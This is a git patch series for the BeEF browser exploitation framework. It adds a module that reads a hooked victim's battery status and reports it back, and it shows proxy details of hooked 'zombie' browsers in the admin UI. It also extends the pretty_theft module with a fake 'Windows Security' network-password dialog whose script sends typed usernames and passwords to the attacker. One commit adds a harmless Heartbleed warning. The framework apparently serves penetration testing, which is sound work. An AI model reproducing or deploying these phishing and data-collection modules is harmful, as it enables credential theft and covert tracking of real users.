From 6044de5604398cd6c9bb1ca375a751bbd23ae934 Mon Sep 17 00:00:00 2001 From: ecneladis Date: Mon, 24 Mar 2014 12:46:43 +0100 Subject: [PATCH 1/5] Adding module for getting battery status --- modules/host/get_battery_status/command.js | 19 +++++++++++++++++++ modules/host/get_battery_status/config.yaml | 16 ++++++++++++++++ modules/host/get_battery_status/module.rb | 17 +++++++++++++++++ 3 files changed, 52 insertions(+) create mode 100644 modules/host/get_battery_status/command.js create mode 100644 modules/host/get_battery_status/config.yaml create mode 100644 modules/host/get_battery_status/module.rb diff --git a/modules/host/get_battery_status/command.js b/modules/host/get_battery_status/command.js new file mode 100644 index 000000000..470035d7a --- /dev/null +++ b/modules/host/get_battery_status/command.js @@ -0,0 +1,19 @@ +// +// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// +beef.execute(function() { + var battery = navigator.battery || navigator.webkitBattery || navigator.mozBattery; + + if (!battery) { + beef.net.send("<%= @command_url %>", <%= @command_id %>, "Unable to get battery status"); + } + + var chargingStatus = battery.charging; + var batteryLevel = battery.level * 100 + "%"; + var chargingTime = battery.chargingTime; + var dischargingTime = battery.dischargingTime; + + beef.net.send("<%= @command_url %>", <%= @command_id %>, "chargingStatus=" + chargingStatus + "&batteryLevel=" + batteryLevel + "&chargingTime=" + chargingTime + "&dischargingTime=" + dischargingTime); +}); diff --git a/modules/host/get_battery_status/config.yaml b/modules/host/get_battery_status/config.yaml new file mode 100644 index 000000000..fef745857 --- /dev/null +++ b/modules/host/get_battery_status/config.yaml @@ -0,0 +1,16 @@ +# +# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + get_battery_status: + enable: true + category: "Host" + name: "Get Battery Status" + description: "Get informations of the victim current battery status" + authors: ["ecneladis"] + target: + working: ["FF"] + not_working: ["All"] diff --git a/modules/host/get_battery_status/module.rb b/modules/host/get_battery_status/module.rb new file mode 100644 index 000000000..3f6271a13 --- /dev/null +++ b/modules/host/get_battery_status/module.rb @@ -0,0 +1,17 @@ +# +# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +class Get_battery_status < BeEF::Core::Command + + def post_execute + content = {} + content['chargingStatus'] = @datastore['chargingStatus'] + content['batteryLevel'] = @datastore['batteryLevel'] + content['chargingTime'] = @datastore['chargingTime'] + content['dischargingTime'] = @datastore['dischargingTime'] + save content + end + +end From d9fd2b994efb45989b48b48f8a1ae4aa98f5306a Mon Sep 17 00:00:00 2001 From: Brendan Coles Date: Sun, 13 Apr 2014 02:29:09 +1000 Subject: [PATCH 2/5] Add browser proxy details to browser summary --- extensions/admin_ui/controllers/modules/modules.rb | 3 +++ 1 file changed, 3 insertions(+) diff --git a/extensions/admin_ui/controllers/modules/modules.rb b/extensions/admin_ui/controllers/modules/modules.rb index 79faddb6f..f3fb6ed04 100644 --- a/extensions/admin_ui/controllers/modules/modules.rb +++ b/extensions/admin_ui/controllers/modules/modules.rb @@ -72,6 +72,9 @@ class Modules < BeEF::Extension::AdminUI::HttpController ['Browser', 'Browser Language', 'BrowserLanguage'], ['Browser', 'Browser Platform', 'BrowserPlatform'], ['Browser', 'Browser Plugins', 'BrowserPlugins'], + ['Browser', 'Using Proxy', 'UsingProxy'], + ['Browser', 'Proxy Client', 'ProxyClient'], + ['Browser', 'Proxy Server', 'ProxyServer'], ['Browser', 'Window Size', 'WindowSize'], # Browser Components From 5d1d519fc2e74bcf9798a07f50404737946608ba Mon Sep 17 00:00:00 2001 From: Brendan Coles Date: Sun, 13 Apr 2014 02:31:52 +1000 Subject: [PATCH 3/5] unless proxy_clients.empty? replace `unless proxy_clients.nil?` with `unless proxy_clients.empty?` --- core/main/handlers/browserdetails.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/core/main/handlers/browserdetails.rb b/core/main/handlers/browserdetails.rb index 6187a3794..fe0f4c6c4 100644 --- a/core/main/handlers/browserdetails.rb +++ b/core/main/handlers/browserdetails.rb @@ -119,7 +119,7 @@ module BeEF if using_proxy == true BD.set(session_id, 'UsingProxy', "#{using_proxy}") proxy_log_string = "#{zombie.ip} is using a proxy" - unless proxy_clients.nil? + unless proxy_clients.empty? BD.set(session_id, 'ProxyClient', "#{proxy_clients.sort.uniq.join(',')}") proxy_log_string += " [client: #{proxy_clients.sort.uniq.join(',')}]" end From f526f39f1015a72d506aa9d296323a31a64c25da Mon Sep 17 00:00:00 2001 From: Brendan Coles Date: Sun, 13 Apr 2014 03:33:32 +1000 Subject: [PATCH 4/5] Warn about Heartbleed if opemnssl is vulnerable Warn user if the OpenSSL library is vulnerable to Heartbleed and HTTPS is enabled. Part of #990 --- core/main/server.rb | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/core/main/server.rb b/core/main/server.rb index b4530ad07..e82c9dc4a 100644 --- a/core/main/server.rb +++ b/core/main/server.rb @@ -108,6 +108,11 @@ module BeEF @rack_app) if @configuration.get('beef.http.https.enable') == true + openssl_version = OpenSSL::OPENSSL_VERSION + if openssl_version =~ / 1\.0\.1([a-f])/ + print_error "Warning: #{openssl_version} is vulnerable to Heartbleed (CVE-2014-0160)." + print_more "Upgrade OpenSSL to version 1.0.1g or newer." + end @http_server.ssl = true @http_server.ssl_options = {:private_key_file => $root_dir + "/" + @configuration.get('beef.http.https.key'), :cert_chain_file => $root_dir + "/" + @configuration.get('beef.http.https.cert'), From 5ddb88db739beb1c1807081e74e650abaa5ea28c Mon Sep 17 00:00:00 2001 From: RootPrivileges Date: Mon, 14 Apr 2014 10:23:30 +0100 Subject: [PATCH 5/5] Add a Windows prompt to the pretty_theft module --- .../pretty_theft/command.js | 59 +++++++++++++++++-- .../social_engineering/pretty_theft/module.rb | 2 +- 2 files changed, 54 insertions(+), 7 deletions(-) diff --git a/modules/social_engineering/pretty_theft/command.js b/modules/social_engineering/pretty_theft/command.js index bceffee04..93c6c2e92 100644 --- a/modules/social_engineering/pretty_theft/command.js +++ b/modules/social_engineering/pretty_theft/command.js @@ -77,9 +77,9 @@ beef.execute(function() { // Check whether the user has entered a user/pass and pressed ok function checker(){ - uname1 = document.body.lastChild.getElementsByTagName("input")[0].value; - pass1 = document.body.lastChild.getElementsByTagName("input")[1].value; - valcheck = document.body.lastChild.getElementsByTagName("input")[3].value; + uname1 = document.getElementById("uname").value; + pass1 = document.getElementById("pass").value; + valcheck = document.getElementById("buttonpress").value; if (uname1.length > 0 && pass1.length > 0 && valcheck == "true") { // Join user/pass and send to attacker @@ -94,9 +94,9 @@ beef.execute(function() { $j('#darkenScreenObject').remove(); }else if((uname1.length == 0 || pass1.length == 0) && valcheck == "true"){ - // If user has not entered any data reset button - document.body.lastChild.getElementsByTagName("input")[3].value = "false"; - alert("Please enter a valid username and password."); + // If user has not entered any data, reset button + document.body.lastChild.getElementById("buttonpress").value = "false"; + alert("Please enter a valid username and password."); } } @@ -163,6 +163,51 @@ beef.execute(function() { credgrabber = setInterval(checker,1000); } + // Windows floating div + function windows() { + sneakydiv = document.createElement('div'); + sneakydiv.setAttribute('id', 'popup'); + sneakydiv.setAttribute('style', 'position:absolute; top:30%; left:40%; z-index:51; background-color:#ffffff;border-radius:6px;'); + document.body.appendChild(sneakydiv); + + // Set appearance using styles, maybe cleaner way to do this with CSS block? + + // Set window border + var edgeborder = 'style="border:1px #000000 solid;border-radius:6px;"'; + var windowborder = 'style="width:400px;border: 7px #CFE7FE solid;border-radius:6px;"'; + + var windowmain = 'style="border:1px #000000 solid;"'; + + var titlebarstyle = 'style="background:#CFE7FE;height:19px;font-size:12px;font-family:Segoe UI;"'; + var titlebartext = 'Windows Security'; + + var promptstyle = 'style="height:40px;"'; + var titlestyle = 'style="align:left;font-size:14px;font-family:Segoe UI;margin:10px 15px;line-height:100%;color:0042CE;"'; + var title = 'Enter Network Password'; + var bodystyle = 'style="align:left;font-size:11px;font-family:Segoe UI;margin:10px 15px;line-height:170%;"'; + var body = 'Enter your password to connect to the server'; + var dividestyle = 'style="border-bottom:1px solid #DFDFDF;height:1px;width:92%;margin-left:auto;margin-right:auto;"'; + + var tablestyle = 'style="background:#CFE7FE;width:90%;margin-left:auto;margin-right:auto;border:1px solid #84ACDD;border-radius:6px;height:87px"'; + var logobox = 'style="border:4px #84ACDD solid;border-radius:7px;height:45px;width:45px;background:#ffffff"'; + var logo = 'style="border:1px #000000 solid;height:43px;width:42px;background:#CFE7FE;filter: progid:DXImageTransform.Microsoft.gradient(startColorstr=#EEF2F4, endColorstr=#CCD8DF);background: -webkit-gradient(linear, left top, left bottom, from(#ffffff), to(#CFE7FE));background: -moz-linear-gradient(top, #EEF2F4, #CCD8DF);"'; + + var inputboxstyle = 'style="width:140px;font-size:11px;height: 20px;line-height:20px;padding-left:4px;border-style: solid;border-width: 1px;border-color:#666666;color:#000000;border-radius:3px;"'; + + var credstextstyle = 'style="font-size:11px;font-family:Segoe UI;"'; + + var buttonstyle = 'style="font-size: 13px;background:#069;color:#000000;border: 1px #29447e solid;padding: 3px 3px 3px 3px;margin-right:5px;border-radius:5px;width:70px;filter: progid:DXImageTransform.Microsoft.gradient(startColorstr=#ffffff, endColorstr=#CFCFCF);background: -webkit-gradient(linear, left top, left bottom, from(#ffffff), to(#CFCFCF));background: -moz-linear-gradient(top, #ffffff, #CFCFCF);"'; + var buttonLabel = ''; + + var bbarstyle = 'style="background-color:#F0F0F0;padding:8px;text-align:right;border-top: 1px solid #DFDFDF;height:28px;margin-top:10px;"'; + + // Build page including styles + sneakydiv.innerHTML= '
' +titlebartext+ '

' +title+ '
' + body + '

Remember my credentials
' + '
' +buttonLabel+ '
'; + + // Repeatedly check if button has been pressed + credgrabber = setInterval(checker,1000); + } + // YouTube floating div function youtube() { @@ -252,6 +297,8 @@ beef.execute(function() { facebook(); break; case "LinkedIn": linkedin(); break; + case "Windows": + windows(); break; case "YouTube": youtube(); break; case "Yammer": diff --git a/modules/social_engineering/pretty_theft/module.rb b/modules/social_engineering/pretty_theft/module.rb index 0cff38b2f..18c656365 100644 --- a/modules/social_engineering/pretty_theft/module.rb +++ b/modules/social_engineering/pretty_theft/module.rb @@ -10,7 +10,7 @@ class Pretty_theft < BeEF::Core::Command proto = configuration.get("beef.http.https.enable") == true ? "https" : "http" logo_uri = "#{proto}://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/ui/media/images/beef.png" return [ - {'name' => 'choice', 'type' => 'combobox', 'ui_label' => 'Dialog Type', 'store_type' => 'arraystore', 'store_fields' => ['choice'], 'store_data' => [['Facebook'],['LinkedIn'],['YouTube'],['Yammer'],['Generic']], 'valueField' => 'choice', 'value' => 'Facebook', editable: false, 'displayField' => 'choice', 'mode' => 'local', 'autoWidth' => true }, + {'name' => 'choice', 'type' => 'combobox', 'ui_label' => 'Dialog Type', 'store_type' => 'arraystore', 'store_fields' => ['choice'], 'store_data' => [['Facebook'],['LinkedIn'],['Windows'],['YouTube'],['Yammer'],['Generic']], 'valueField' => 'choice', 'value' => 'Facebook', editable: false, 'displayField' => 'choice', 'mode' => 'local', 'autoWidth' => true }, {'name' => 'backing', 'type' => 'combobox', 'ui_label' => 'Backing', 'store_type' => 'arraystore', 'store_fields' => ['backing'], 'store_data' => [['Grey'],['Clear']], 'valueField' => 'backing', 'value' => 'Grey', editable: false, 'displayField' => 'backing', 'mode' => 'local', 'autoWidth' => true },